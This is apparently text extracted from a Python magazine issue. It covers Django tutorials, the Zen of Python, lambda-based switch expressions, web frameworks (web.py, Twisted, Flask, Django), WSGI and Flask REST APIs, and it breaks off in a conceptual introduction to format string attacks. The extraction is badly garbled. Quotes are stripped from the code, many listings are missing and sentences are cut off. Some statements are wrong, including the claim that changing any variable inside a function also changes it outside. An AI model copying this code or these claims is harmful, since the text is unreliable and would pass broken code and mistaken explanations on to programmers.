command again and and you just created a whole admin site, ready to manage your data. Lets see what we
have.
You can login with your username and password that you created in the first syncdb.
Lets register our model in the admin. I like to create a file admin.py for each one of my apps, and there,
register the models of the app. For the products app it should looks like this:
from django.contrib import admin
from products.models import Product
admin.site.register(Product)
Now youll be able to edit your products. The Django admin is a powerful tool and you can personalize
it, read the admin docs https://docs.djangoproject.com/en/1.5/ref/contrib/admin/ to suit the admin to your
needs. Were ready to put something in our home page, at least a list of our products.
Writing your first views
You just created the index view, it just receives an HTTP request and returns a response, but by itself doesnt
do anything, you have to set the urls to find the view. On your dbuy/urls.py add the following code:
url(r^$, products.views.index, name=index),
178
This will get all your products and render the template. When the render function finds a template variable
products it will associate with the python variable. But for this code works you have to write your templates.
On settings.py, find the variable TEMPLATE_DIRS and add the path to your template dir. Its highly recommended
that you dont hardcode it. Most of the time youre working, you read someones else code, so you need a
dynamic configuration for any os (Listing 6).
Listing 6. A longer piece of Python code
from os.path import abspath, dirname, join
PROJECT_ROOT = dirname(abspath(__file__))
TEMPLATE_DIRS = (
join(PROJECT_ROOT, templates),
)
179
some description
games
Shoes
another description!
games
For more inf ormation please send an e-mail to email@domain.com.
Ok, nice! But lets use another function to return an HttpResponse object. Refactoring our view: Listing 8.
Listing 8. A longer piece of Python code
from django.shortcuts import render
from products.models import Product
def index(request):
products = Product.objects.all()
return render(request, index.html)
Better! The render function does the exact same thing of those lines of code, it receives an HttpRequest,
renders the template with the context variables and returns an HttpResponse.
For now, you delivered a simple pa
Django.
o deal with media and static files and use some of the power inside
180
Note: These static and media configs are only for development, when you deploy your application you have to
serve your static files in another server, not via Django.
What are you saying by doing that? You shouldnt deploy your Django application with DEBUG = True, by
obvious reasons, so if the DEBUG variable is True, it means that youre in the development mode, so
Django will serve the static files. The static function does this verification.
Now write the url that will handle the request
url(r^product/(?P<product_id>\d+)$, products.views.product, name=product),
A url is a regular expression, that way you can specify the type of your url parameters easily, if you dont know
regular expression, you should read the python documentation [2] about it. All you need to know here, is that the url
has this pattern /product/product_id, where product_id is a integer and the name of the view parameter.
def product(request, product_id):
product = Product.objects.get(id=product_id)
return render(request, product.html, {product: product})
The view product received the product_id, made a query to the database, and rendered the template with the
product variable in the context. Now the html: Listing 1.
Listing 1. A longer piece of HTML code
<html>
<head>
<title> D-Buy </title>
</head>
<body>
<h1> {{ product.name }} </h1>
{% if product.photo %}
<img src={{ MEDIA_URL }}{{ product.photo }} />
{% endif %}
<ul>
181
As the product photo is not required, you have to check if there is a photo to render it. The {{ MEDIA_URL }}
tag came from the settings.py. Run the server and access the url http://localhost:8000/product/1 and youll
see something like that. A little adjust on the index (Listing 2). Or you can just use the url template tag and
the url name.
<h3><a href={% url product product.id %}>{{ product.name }}</a></h3>
Now you have to sell the products, for that the customers need an account. Use the startapp command to create the
app profiles, on your profiles/models.py (Listing 3).
Listing 3. a longer piece of Python code
from django.db import models
from django.contrib.auth.models import AbstractUser
class Customer(AbstractUser):
birth_date = models.DateField(uBirth date, null=True, blank=True)
Add your app on INSTALLED_APPS and create a file profiles/admin.py and register your new User model.
from django.contrib import admin
from profiles.models import Customer
admin.site.register(Customer)
That way, youre saying that the authentication system will use your user Model instead of the standard.
Basically the new user does the same thing that the old one (django.contrib.auth.models.User) but it adds a
field, birth_date, to the register. Now, run the syncdb command, it will delete your old user and create a new
one, in other opportunity you will learn a way to migrate your data. But the user will need a login page.
Django has its own login and logout system built in, but first lets talk a little bit about forms! IMHO, django
forms is one of the best things about the framework, it renders the html, the validation, the errors with few
code lines. Lets do some magic here and in another opportunity well talk about django forms.
At profiles/views.py (Listing 4)
182
You can define a base template, base.html, and create a block, and on all other templates you put the content
inside this block and the django template tag will do the rest of the work. Refactoring our templates:
183
Now, to finish, lets put some style in our code! For this example lets use the twitter bootstrap. Download it
at getbootstrap.com unzip and put it into a folder dbuy/static/. You can use the STATIC_URL variable, to make
some necessary changes.
STATIC_URL = /static/
STATICFILES_DIRS = (
join(PROJECT_ROOT, static),
)
Doing this youre commanding django to look for static files in the dbuy/static/ directory. And at the
templates, you just need to add the path to the css or js.
184
References
185
Philosophy of Python
by Douglas Camata
In this article I will present you the basics of Python programming language. From its
history to some code. Not forgetting to show you who is using it and convince you to use it.
Pythons language begun in the late 1980s, when it was conceived. Guido van Rossum, its creator and
principal author, started the implementation in December 1989, at CWI. Guidos makes all decisions about
the direction of Python and, because of that, hes called by the community, Benevolent Dictator for Life.
Python uses dynamic typing. In other words, you wont need to tell Python the types of your variables, it will
guess by itself! You wont even need to declare them before you use. You can see that working on Figure 2.
186
Although it uses a dynamic typing, its a strong typing. It means Python wont let you do some operations
with two variables of different types, unlike Javascript (where you can add a number to a string, for
example), unless you teach him how to or do a typecast from one type to another.
See Figure 3. Please, note that Python doesnt need anything at the end of the line, you will never forget a
semicolon again!
The Pythons philosophy is based on the so called The Zen of Python. This is its content: Listing 1.
Listing 1. The Zen of Python
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases arent special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless youre Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, its a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- lets do more of those!
Python phisolophy care more about the code itself, its beauty and good readability, than performance. You
should think about your case and know what is more important for you. Therere many ways to tune the
performance of a beautiful code without making it ugly.
187
One more important thing to take note: everything in Python is a reference to the memory. In other words,
pretty much everything is like a C pointer. If you have a variable named my_var in your code, pass it to a
function and change its value inside the function, the my_var value will be updated outside the function too.
Figure 5. Basic tuple and array use and proof that tuples are immutable
There are many functions of working with lists, if you are familliar with functional languages, you
can map and reduce in Python too! And just to make things better, you can use list comprehensions to
generate an entire new list when iterating over another. See Figure 6, 7 and 8 for some examples of these
wonderful functions.
188
Dictionaries are very wonderful data structures too. They provide, as the name says, key-value storage. You
can initiate them previously using brackets and, in this case, you can set some key-value pairs. Access to
values, addition of values, and the dictionary initiation are shown in Figure 9. Remember that dictionaries
keys and values may be any kind of object.
Functions
Functions can be defined using the def keyword and they can receive a finite number of arguments
(including zero), a list of arguments, or a dictionary of arguments. See Figure 10 for a example a simple
function which sum two arguments. Note that theres no verification of type or anything like it. All the error
handling regarding to the arguments type are the users responsibility.
Hey can even be assigned to a variable. Lets say that you want to (dont try to think why), temporarily
replace some built-in function. You can assign the actual function to a variable, then replace the built-in
with your own function, and put the original function back when youre done. See Figure 11 for an example.
Believe me, someday, this will save you.
189
Object Orientation
Object orientation is pretty straight forward in Python. You can define your own classes and inherit built-in
classes, but you cant modify built-in classes. The only thing thats hard to understand in Pythons objectorientation is the self, but you dont really need to understand why its there (its complicated), just accept its
existence and dont ever forget it.
Lets create a simple Duck class with a talk method, create an instance and make it talk. See Figure 12
for the implementation.
Thats how you create class instances in Python. Note the self argument in the talk method. If you dont
put it there, you will get an argument error when trying to run the method. Now, lets add a parameter to our
Duck class and give a name to the duck. This can be done by implementing a method named __init__ inside
the duck class. In Python, you will find many methods surrounded by underlines. Theyre called magic
methods and they have their purpose. The __init__ method is used when creating an instance of your class.
So, we will add a name parameter there and set the objects name attribute to its value. Figure 13 shows the
implementation.
By using self.name = name, were setting an attribute in our object. As Figure 13 shows, now you can access
the ducks name using the attribute. If we dont use self there, the name variable would only be accessible
inside __init__ method.
190
Figure 14. A Nest class for your Duck class that responds in a particular way to the len
function
When len is called on the Nest class, it will, under the hood, call the magic method __len__. Its really
magical! Now, lets overload the sum operator of the Nest class to accept new ducks and only instances of
the Duck class. Figure 15 holds the implementation.
Obviously, the magic method needs the other object as an argument to overload the sum operator, thats why
its there. Then, we used the isinstance built-in method to check if the object were trying to sum with the
Nest is an instance of the Duck class. If positive, we add the duck to the duck list, otherwise, we should do
something about it, like raise an error. We will see more about error raising and handling in the next topic.
Isnt that code in Figure 16 beautiful? Now, lets pretend that our code may raise many exceptions and we
want to handle a specific one. 1 + a would raise a TypeError (go on and try it on the dynamic interpreter by
yourself), so we modify our code to handle only that kind of exception. Give Figure 17 a look.
This way, if the code block raise any exception thats not a TypeError class, the interpreter will stop and you
will see the stacktrace in your screen, feel free to add anything before the 1 + a line that would raise an
exception, like 1/0, and see.
You can chain many excepts in a try...except block to handle each different exception in its own way and
have a default handler when an unknown exception was raised. You can even handle many errors in the
same way by using a tuple of errors instead of just one. Figure 18 shows that. Lets check something, what
do you think is wrong if Figuress 18 code? If an unpredicted exception raises, the code below may not work
as expected. So, try to always know the class of the exception youre trying to handle.
Now, as you saw, exception handling is pretty easy, huh? So is the exception raising. Lets get back to
Figures 15 code. The magic method to overload the sum operator was added to the Nest class and if the
other object isnt a Duck class, were only printing something. Thats not cool. So, lets make it raise a real
exception, as shown in Figure 19.
192
Summary
Pythons very good tool and does its job very well for those who value readability more than performance
and, if you want to take every drop of performance that Python can give, you can try PyPy (an interpreter
with a just-in-time compiler), or Cython (python code that generates C code and run it to get a real
performance boost). When you code something using it, you will surely refer your code 1 month later and
still understand it, and even more if you follow good coding practices. It has plenty useful built-in functions
and an extensive, and well documented, standard library. Not to mention Pythons community. Everybody
will be glad to help if you have any issue or problem. Unfortunately, I cant write everything about Python
here, so give the links below a try and learn more!
On the web
193
This article will look at more elaborate examples of the same basic idea.
Thats a procedural way of doing things: initialize a variable, then incrementally update it in a specified
sequence to accumulate the result. Now compare a more functional way:
194
This uses Pythons list comprehensions to construct the entire result in a single expression. Much more
compact, much closer to the natural-language explanation of what the code is doing (output all of the integers
from 0 up to, but not including, 100, which are even), but more importantly, much more mathematical.
Mathematics is good, because it has evolved over centuries to help make clear the structure of things, allowing
us to manipulate those structures, reason about them, and determine useful properties of them. As programmers,
it behooves us to benefit from this accumulated wisdom.
(If cond, then evaluate expr1, else evaluate expr2.) For some reason, Python didnt adopt this form when it
added conditional expressions in version 2.5; instead, it went for
expr1 if cond else expr2
Personally, I find this ugly, though I have been (grudgingly) using it in a few cases. Initially I started out
using a form like this:
(expr1, expr2)[cond]
which constructs an array of the two expressions, and uses cond as an index to select between them. This
works if cond is boolean-valued (which I always ensure as a matter of course anyway), or at least evaluates
to one of the integers 0 or 1. But the problem is that both expr1 and expr2 are always evaluated. For
example, consider the expression
o.c if o != None else None
being rewritten as
(None, o.c)[o != None]
The problem with the latter form is that it will fail with AttributeError: NoneType object has no attribute
c if o happens to be None, because the o.c expression is still being evaluated in this case.
Just by sticking lambda : in front of each expression, this becomes a choice between two functions of no arguments
depending on whether o is equal to None or not: the first one evaluates to the right result when o is equal to None,
the second one when it is not equal to None.
Why lambda? Using lambda is just a convenience. You could equally rewrite the above by adding the
following ancillary definitions:
def f1() :
return None
#end f1
195
which, you will agree, is a bit more long-winded. Using lambda just shortens the whole process and avoids
introducing a proliferation of single-use names. To evaluate a function of no arguments, just put a pair of
empty parentheses after it:
(lambda : None, lambda : o.c)[o != None]()
Et voil! This only evaluates the selected function, giving us the lazy-evaluation semantics we need. Which
the built-in conditional-expression construct gave us for free anyway. So this seems like a lot of work to go
to, just to avoid using that, isnt it?
Which may be true, but wait till you see what else you can do with these lambdas...
where the selector was an integer-valued expression, so choice1 was picked when the selector was 1,
choice2 when it was 2, and so on, with the (optional) defaultchoice being picked when the selector didnt
correspond to any of the previous choices. Like most constructs in ALGOL-68, this could be used
as either a statement (selecting from alternative choice statements to be executed) or an expression
(selecting from alternative choice expressions to evaluate).
If youre familiar with C-like languages, youre likely expecting to see something more like
switch (selector)
{
case 1:
choice1
break;
case 2:
choice2
break;
default:
defaultchoice
break;
} /*switch*/
where the applicable selector value for each choice is given explicitly, rather than implicitly by ordering.
This is the more usual form nowadays. But C and most of its derivatives never offered the use of such a
construct in expressions, only statements.
Python doesnt offer either statement type, but its easy enough to construct conditional expressions of either
form, using the same lambda-trick we saw above. To do ALGOL-68-style implicit case ordering, select from
an array of functions:
196
(The subtraction of 1 because the ALGOL-68 selection is 1-based, whereas array indexing in Python and
other C-like languages is 0-based.) This looks the same as the previous construct for selecting from two
options, just generalized to more than two options, chosen by an integer-valued expression, numbered from
0. Note however there is no option for a defaultchoice in this construct. To do more modern explicit case
selection, use a dictionary:
{
1 : lambda : choice1,
2 : lambda : choice2,
}[selector]()
where the dictionary keys stand in for the case-labels. To add a default choice, for when the selector doesnt
match any of the explicit keys, use the get method:
{
1 : lambda : choice1,
2 : lambda : choice2,
The nice thing is that you are not limited to integer selectors as in C or ALGOL-68; you can use strings, or
indeed any immutable Python type. For example, here is a routine I wrote as part of a script for parsing Blender
documents (available here: https://github.com/ldo/blendparser). It uses the type of the argument expression to
select the right formatting expression to use; if this is not one of a set of known types, then it is assumed to be a
dictionary, containing a name entry which is the type name.
def type_name(of_type) :
# returns a readable display of of_type.
Return \
{
PointerType : lambda : type_name(of_type.EltType) + *,
FixedArrayType : lambda : %s[%d] % (type_name(of_type.EltType), of_type.NrElts),
MethodType : lambda : %s (*)() % type_name(of_type.ResultType),
}.get(type(of_type), lambda : of_type[name])()
#end type_name
Note the recursive invocation to handle pointer-to-type, array-of-type and function-returning-type. Primitive
Blender types are represented in the script by dictionary objects.
Summary
The beauty of Python is that the core language is so small, yet so powerful. It may not have quite the
capability for writing mind-bending constructs that, say, Perl offers. Which is probably just as well. But there
are still a few opportunities to get creative...
197
198
Frameworks
When developing a web application or a web service, you may choose to write it from scratch using the
libraries that come with Python distribution or you may use framework. A framework may save you a
lot of time, but it comes with a learning curve. Django is the most complete framework and suitable for
developing a full web application, but it may not be the best option if all you need is to write a simple
web-service. In this case, Web.py may be your best choice. In the end, the decision depends on what you
need to build, what you and your team already know and the time frame you have for the project. In this
section, we will show the main framework options and show a simple hello example, in order to help you
choose the best framework for your project.
Web.py
web.py is a small web framework that aims at simplicity and not getting in the way. It is currently used by
Yandex, according to its website. Mainly, it consists of a regular expression based url routing map and a
class to server requests through methods named after the HTTP request method in use. Lets look at a simple
example in Listing 1.
Listing 1. Simple web.py example
import web
class MyService:
def GET(self, name):
return Hello {0}.format(str(name))
urls = ( /(.*), MyService )
app = web.application(urls, globals())
if __name__ == __main__:
app.run()
In the example, all requests will return the string Hello uri, where uri will be replaced by whatever is sent
in the url after the server name/port. Uris are mapped by a tuple:
urls = ( /(.*), MyService )
The mapping consists of every two elements in the tuple, an uri regexp and a class that provides a handler
function. If you need to map more uris, you can just insert them in the tuple, as you can see in Listing 2.
Listing 2. Mapping uris to handler classes
urls = (
/, MyService,
/users/(.*), MyUsersService,
/groups/(.*), MyGroupsService
)
Every request to a uri will generate a new instance of the class associated with it. Within the object, the
application will search for a function with the same name as the request method (GET, POST, etc. ). This
function must return a string containing the response body.
199
Twisted is a full featured event driven networking engine. It provides, among many features, an HTTP
Server. It is currently being used in many projects.
While being a very powerful networking and web framework, twisted may be intimidating due to the overly
technical (or, sometimes, the lack of) documentation.
In twisted you must define a class inheriting Resource which will handle requests. A Resource is then
associated with a Site. You may route different Resources associating them as children of a root resource. In
Listing 3, you can seehow the same example presented in web.py looks in twisted.
Listing 3. Simple twisted example
from twisted.web import server, resource
from twisted.internet import reactor
class MyServiceResource(resource.Resource):
isLeaf = True
def render_GET(self, request):
request.setHeader(content-type, text/plain)
return Hello {0}.format(request.path[1:])
if __name__ == __main__:
factory = server.Site(MyServiceResource())
reactor.listenTCP(8080, factory)
reactor.run()
In the example above, all requests will return the string Hello uri, where uri will be replaced by whatever
is sent in the url after the server name/port for any uri accessed.
Every request to a uri will use the same instance of the class associated with it. Within the object, the
application will search for a function name consisting of render_ and the request method (render_GET, render_
POST, etc...). This function must return a string containing the response body.
is a variable set to indicate end of resource call chain. Resources may be set as children of another
resource using putChild.
isLeaf
To access a resource in the url /service or /custom you must setup a root resource and insert a child for each
url. That is called resource nesting and it is presented in Listing 4.
Listing 4. Resource nesting with twisted
if __name__ == __main__:
root = Resource()
root.putChild(service, MyServiceResource())
root.putChild(custom, MyCustomResource())
factory = server.Site(root)
reactor.listenTCP(8080, factory)
reactor.run()
SimpleHTTPServer
Originally built to serve files from a directory, simpleHTTPServer is an internal HTTP server normally
distributed with python. It is a great tool for environments where you cant add an extra package to the default
python installation. It does not provide a networking interface, so we must wrap it using a SocketServer.
200
def do_GET(self):
self.send_response(200, OK)
self.send_header(Content-Type, text/plain)
self.end_headers()
self.wfile.write(Hello {0}.format(self.path[1:]))
Django
Django is a the most complete web development framework available for Python, it includes an objectrelational mapper, an admin interface, a template system, a cache system and many tools to help with
common web-development needs like authentication, logging and internationalization. To create a Django
project, we start with: django-admin startproject myproject. Where myproject should be replaced by your
project name. After running this command, a folder called myproject will be created with a structure as
shown in Figure 1.
The first thing to do is to add your project to the INSTALLED_APPS list in settings.py file. Then, we edit the
urls.py file, where the URLConf module is located and contains a mapping from URL Patterns to Python
callback functions. Listing 6 shows how it will look like for the Hello App.
Listing 6. URL Conf example
from django.conf.urls import patterns
from hello import views
urlpatterns = patterns(,
(r^(.*)$, views.hello),
)
201
Now that the coding is finished, you can run it using: python
manage.py runserver.
As you can see, with Django, it takes more work to write a simple example, however if you have a more
complex application, using it will really pay off.
Flask
Flask is a micro-framework with builtin server and debugger, unit test support and a template system based
on Jinja2. Flask uses decorators to define the url mapping, functions that should be executed before a request
and many other things. In the hello example, we use the decorator @app.route(uri rule). To tell Flask that
the decorated function should be executed when a request to uri that matches the uri rule is made. The rule
may contain parameters, which need to be marked using < and >. In our hello example, we use the data
variable to capture the string that will be concatenated to hello. As we may want to call it without any data,
we need to also to add a route with the default value for data, as you can see in Listing 9.
Listing 9. Hello in Flask
from flask import Flask
app = Flask(__name__)
@app.route(/<data>)
@app.route(/, defaults={data : })
def hello(data):
return Hello +data
if __name__ == __main__:
app.run()
Sample Application
Our sample application consists of a simple page that displays stock quotes for a selected list of stocks.
We decided to build the web application using django, because it is the most popular Python web
framework. The web application consumes web-services written in Twisted, which is overkill for such
an application and we did it this way just to show you how it can be done if your application demands
more layers. Stock quotes are obtained using yahoos public finance api, and all configuration options
are stored in a sqlite database. Figure 2 shows how this components will communicate.
202
Webservice
The webservice was built using twisted because of the powerful tools it provides and to prevent a
handler instance allocation per request. Our webservice consists of a database handler and two url
locations: /setting/ to store and retrieve application settings and /stock/ to add stocks and retrieve their
quote. As shown in the Twisted example, these url locations are handled by resources, which in our case,
we called then MyServiceSettings and MyServiceStocks.
You can check them in detail on github. The database handler contains methods that will perform all
database operation we need. Listing 10 shows an excerpt with the add_stock method.
Once we have the Database handler method, we can write the web-service method. For the add_stock
example, it will be a POST request with a url /stock/<SYMBOL>, where <SYMBOL> is replaced by the actual stock
symbol. The resource handles this request, parses the stock symbol and calls the add_stock method. Listing 11
shows how this is done.
Listing 10. Database handler add_stock method
class MyServiceDatabase():
Database handler class
def __init__(self, db=database.db):
Open database
self.conn = sqlite3.connect(db)
def add_stock(self, symbol):
Add a stock to the portfolio
self.conn.execute(INSERT INTO portfolio(symbol) VALUES(?), (symbol,))
self.conn.commit()
203
try:
self.db.add_stock(stock)
except (TypeError, ValueError, KeyError, sqlite3.IntegrityError) as e:
result = {status: error, message: e.message}
return json.dumps(result)
Application
As we did in our hello example, the first thing that was done was to add the module in the INSTALLED_APPS list
in settings.py, then edit the urls.py setting the index page. We also created a views.py file which contains the
index page and must be imported by urls.py in which we will set the url routing. We defined two paths: the
default, where we will call the index method and remove/<SYMBOL> where we call the remove_stock method. The
urls.py can be seen on Listing 12.
Listing 13. add stock excerpt from models.py
class Stock():
Model for webservices stock data
def add_stock(self, stock):
Add a stock to webservice
conn = HTTPConnection(localhost, 8080)
conn.request(POST, /stock/{0}.format(stock))
response = conn.getresponse()
if response.status != 200:
raise Exception(response.read())
return True
204
The view contains the methods that will perform the business logic, in our case to consume the webservices.
When accessing a url django will check the url mapping setup in urls.py and use that view to service the
request. A view must respond with HttpResponse or an Exception, which may be constructed using an html
template filled with data from our model using the django template language.
Django is a database oriented framework, since our data interaction will be handled through a webservice we
must implement a custom model class instead of using default models provided by django. Our model will
add, remove and list stocks from the webservice through simple httplib requests. In Listing 13, we show how
adding stocks would look.
To implement the view, we use the model which then, consumes the webservice. Listing 14, shows view.
py. Note that the index method may call add_stock if the request method is POST, otherwise it will just
list stocks. The method list_stocks belongs to the model, even though is not in Listing 13, you can find it
in github.
Finally, an index.html page was developed using Django template language to display the stocks listed that
were recorded in the context and provide a form so, that the user can add more stocks.
Deploying
Once your application is ready, it is time to deploy it. You have quite a lot of different options to put your
project in production but most of them fall into one of two categories. In one category you have options like
dedicated servers, VPSes or cloud IAAS like Amazon AWS. With this options you will need to manage not
just your application but also the servers where it will run. This approach has the down side of overhead on
the system administration side, but on the other hand you have full control over the software and can be sure
that doesnt matter how your project was developed, you will be able to deploy it.
The other hosting category are the shared hosting environments and the PAAS like Google App Engine
or Heroku. The advantage of this kind of hosting is that there are no servers to be administered. All
administration burden is on the hands of the service providers. The main downside (and that sometimes
could be a complete deal breaker) is that you will need to adapt your application to the provided
environment. Some service providers allow a certain level of customization on the environment when others
offer none. Its also not uncommon that in some cases they just dont have your framework or the version of
your framework of choice available to be installed.
Because the differences on environments between the shared/PAAS category of hosting providers, we will
focus on the deployment of a python application on a dedicated/VPS/IAAS server.
205
Now, to setup your Django/Flask application, create another file on /etc/supervisor/conf.d directory using the
configuration example on Listing 16 changing the uppercase string as needed.
After the creation of the Supervisord configuration files, run the command sudo service supervisor start
to start Supervisord and allow it to start your configured applications. By default Supervisord on Ubuntu
is already set to start and stop during system boot and shutdown.
Please note that deploy an application to production environment is a complex task and that the tools
outlined above have many configuration options that were not explored for the sake of brevity reasons. With
this in mind is strongly advised to study further the tools and get familiar with the best practices of each of
them before really go live with your application.
206
Summary
In this article, we showed a couple of python web-frameworks and how they could fit together to build
a simple application. Choosing a framework can be tricky, as it may limit your deployment options and
impact your learning curve and development performance. As rule of thumb, if you dont know any of the
frameworks, we would say, if the application is really, really simple, use Web.py. If it is simple, use Flask,
if it is complex use Django. Unless, you have a strong reason you should not use the SimpleHTTPServer.
Twisted has functions, it is very scalable and very high performing, but it is very hard to use. It should be
your choice, when you need to integrate and/or implement some protocol from scratch, where there is no
packaged solution available.
On the Web
Glossary
207
Its all about the way you write. The application side
WSGI applications must follow the protocol to understand what the web server commands and what to
feedback. In the middle of the web server and the application is something called the application server.
But lets start talking about the application side. Basically, our applications need to receive two arguments: a
dictionary and a callback function. And must respond with an iterable containing the response body:
# app.py
def my_first_wsgi_app(environ, start_response):
response_body = Hello World
status = 200 OK
response_headers = [
(Content-Type, text/plain),
(Content-Length, str(len(response_body))),
]
start_response(status, response_headers)
return [response_body]
In parts:
environ contains environment variables;
start _ response
is a callback function used by the application to send HTTP headers to the server;
response _ headers
is a list of tuples, containing the headers that we will send to the server;
we call start _ response and send all the HTTP headers to the server;
we return an iterable with the content. In that case, we are using a list.
Pretty simple, huh?!
208
Not a single line of code of our application has changed, and we can serve it in many different servers. This
is the beauty of WSGI.
As you can see, using WSGI is beneficial to your project design. The pieces have weak coupling, and they
can be replaced without touching the other pieces.
209
Summary
When you use Django, for example, you really dont need to concern yourself with the integration between
your application and the application server. Frameworks are responsible for that, and they do it very well.
But its necessary to know what is going on and what flow a request will follow until it gets to your
application.
With the WSGI specification you can combine different frameworks with different application servers,
adding to it your favorite web server. Its easy, its modular. That is the reason why it makes our lives better.
On the Web
http://www.python.org/dev/peps/pep-0333/ The Python Enhancement Proposal that describes the WSGI protocol
http://gunicorn.org/ A Python WSGI HTTP server for Unix
http://projects.unbit.it/uwsgi/ A high-speed WSGI server
http://code.google.com/p/modwsgi/ A Python WSGI adapter module for Apache
References
http://www.python.org/dev/peps/pep-0333/
http://wsgi.readthedocs.org/en/latest/frameworks.html
http://wsgi.readthedocs.org/en/latest/servers.html
http://gunicorn.org/
http://projects.unbit.it/uwsgi/
http://code.google.com/p/modwsgi/
http://docs.python.org/2/library/wsgiref.html
http://uwsgi-docs.readthedocs.org/en/latest/Protocol.html
210
Until this point, the Django development process has been fairly standard. The schema has been designed
as per requirements and translated into models using the ORM. Now comes the next step, creation of forms
which is where we will encounter some magic!
As I had promised, we are not going to attach the models
info/forms.py (Listing 2).
_directly_
212
Now to create the templates, we shall create a file called shipping_info/templates/address.html and fill it with
the following:
<form action=/address/ method=post>
{% csrf_token %}
213
Now, on configuring your urls.py to include this app with its view functions you should be able to run your Django
project. Specifically, the urls.py file should read as follows:
from django.conf.urls import patterns, include, url
urlpatterns = patterns(,
url(r^address/, shipping_info.views.fill_form, name=address),
url(r^success/, shipping_info.views.success_page, name=success),
)
On directing your project to localhost:8000/address, you should see your form successfully rendering here.
Yes, it was that simple!
But wait, we still have to create the success page so that you know that your form has successfully submitted
the values.
In shipping_info/views.py, add the following view funtion:
def success_page(request):
return render(request, success.html)
You dont believe me? Enter valid values in the form and press submit. You can now either go to your
database shell directly or use the django shell to access the database and see the input values.
The following steps outline how you can perform this from the Django shell:
$ python manage.py shell
>>> from django.db import models
>>> from shipping_info.models import *
>>> latest_user = ShippingDetails.objects.latest(name) ## to get latest user saved into
database
>>> name = latest_user.name # to get name of that user
>>> city = latest_user.city # to get city of that user
>>> phone = latest_user.phone # to get phone number of that user
>>> user_object = ShippingDetails.objects.get(name = put your name here)
214
Conclusion
As you can see, using ModelForms makes working with forms a simple process. It also tightly binds the
forms to the models which is where the data gets stored.
Further Reading
http://pydanny.com/core-concepts-django-modelforms.html
http://www.slideshare.net/shawnrider/django-forms-best-practices-tips-tricks
https://docs.djangoproject.com/en/1.5/topics/forms/modelforms/
215
Thank you!
217
What is a microframework?
A microframework intends to be as simple as possible and generally provide the following:
Handles HTTP requests and responses
Small template engine
URL Routing
Sessions
Just for an example, if you look at Django, it will have the following out-of-the-box:
Handles HTTP requests and responses
URL Routing
Powerful template engine
ORM Object Relational Mapper
Admin Interface
Sessions
218
Flask
Flask is a microframework created by Armin Ronacher (also know as Mitsuhiko) that started as an April, 1st joke
(you can read more about it in the link Opening the Flask) and refers to itself as Flask is a microframework for
Python based on Werkzeug, Jinja 2 and good intentions.
It supports the following out-of-the-box:
The excellent Jinja2 template engine
Werkzeug, a utility library for WSGI (read more here: http://werkzeug.pocoo.org/docs/tutorial/#step0-a-basic-wsgi-introduction)
Lets see an example of a Flask application, but first, let us create a virtual environment for our tests using
virtualenv and virtualenvwrapper:
Note that {flask} information on my shell it means that Im using the virtual environment that we created,
so we need to install Flask now, lets do this:
219
Now open a browser and you will see a Hello World message:
Everything all right? Well, lets make something cooler than just the Hello World now suppose we need to
create a Restful webservice (thanks to Miguel Grinberg for the idea) to add, delete and list our preferred books.
It is important to plan how you will expose your service, because when you publish it and the users start to
consume your API it will be harder to change the URL it is possible, but it will give you some headaches
because you can leave your consumers without data.
In our case, here is some explanation, but remember it is not set on stone, you can design your API URL as
it pleases you:
220
After defining the URL, here is some information about the HTTP methods that we are going to use, the URI
that will be exposed and their actions:
HTTP Method
GET
GET
POST
PUT
DELETE
URI
http://[hostname]/catalog/api/v1/books
http://[hostname]/catalog/api/v1/books/[book_id]
http://[hostname]/catalog/api/v1/books
http://[hostname]/catalog/api/v1/books/[book_id]
http://[hostname]/catalog/api/v1/books/[book_id]
Action
Retrieve a list of books
Retrieve a book
Create a new book
Update an existing book
Delete a book
For the sake of the length of this article, we will just retrieve a list of books, retrieve a book and create a new
book, ok?
Now that is clear what we need to do, lets do some coding open the flaskapp.py file and make the
following changes:
Now lets run the application you should see something like this:
221
Nice, huh ! Now lets add the code to get just one book first, we need to add an import to the abort module
of Flask, so add it in the first line:
Now lets add the method that will give us just one book or give us a 404 error if the book does not exist:
Lets test it again, access the following url: http://127.0.0.1:5000/catalog/api/v1/books/1 and you should
see something like this:
222
Well, now lets test with a book that does not exist, access the following url: http://127.0.0.1:5000/catalog/
api/v1/books/99.
And now, lets add the code that will use the HTTP POST method to allow us to create new books:
Ok, now that we have the method, lets test it open a console/terminal and type the following curl command:
223
Now lets see in the browser if everything went as planned, access http://127.0.0.1:5000/catalog/api/v1/
books/4 in your browser:
Hooray! It is like when the Colonel John Hannibal Smith of the A Team used to say: I love it when a plan
comes together.
So we learned how to create a simple Restful API using just Flask and it was quite an easy task, but it could
have been even easier you can use the excellent Flask Restful extension along with the splinter acceptance
testing tool to ensure that your API works as intended.
What about other microframeworks? Lets look briefly about other options that deserve some attention when
working in this kind of application.
224
Now, lets create a file called app.py in this directory and add the following code to it:
Now just execute the app.py file using the following command:
Note that I did not create a virtual environment, we are using the bottle.py file that we downloaded from
github.
Open your browser on http://localhost:8080/hello/developer and you will see the following: \
225
Article Links
226
Introduction
Format string attacks are not particularly new. Since their widespread public release in 2000, format string
vulnerabilities have picked up in intensity as buffer overflows become less common and more widely
known. From an unknown start a decade ago, they have become a common means of exploiting system
applications. These vulnerabilities (We can see from 2010-06-30: KVIrc DCC Directory Traversal and
Multiple Format String Vulnerabilities, that format string vulnerabilities have not disappeared and are still a
valid topic today.) remain an issue as we still teach them.
We will start by explaining what a format string actually is and then why they can be exploited.
It is not uncommon for format string vulnerabilities to allow the attacker to view all the memory contained
within a process. This is useful as it aids in locating desired variables or instructions within memory. With
this knowledge, an attacker can exploit the vulnerability to successfully exploit code and even bypass control
such as Address Space Layout Randomization (ASLR).
When a parent process starts, the addressing for that process as well as all subsequent child process in most
implementations will remain static throughout the lifetime of the process. Although an attack may crash a
child process, the parent process is often left intact. Consequently, attacks against child processes that cause
a crash of the particular thread or fork may return useful information. This is particular true when multiple
format string attacks can be leveraged against child processes that respond themselves without crashing the
parent application.
Many Linux implementations incorporate a process-limit in order to limit the number of re-spawns and this
can help minimize the impact of the attack noted above by enforcing an RLIMIT_NPROC rlimit (resource limit)
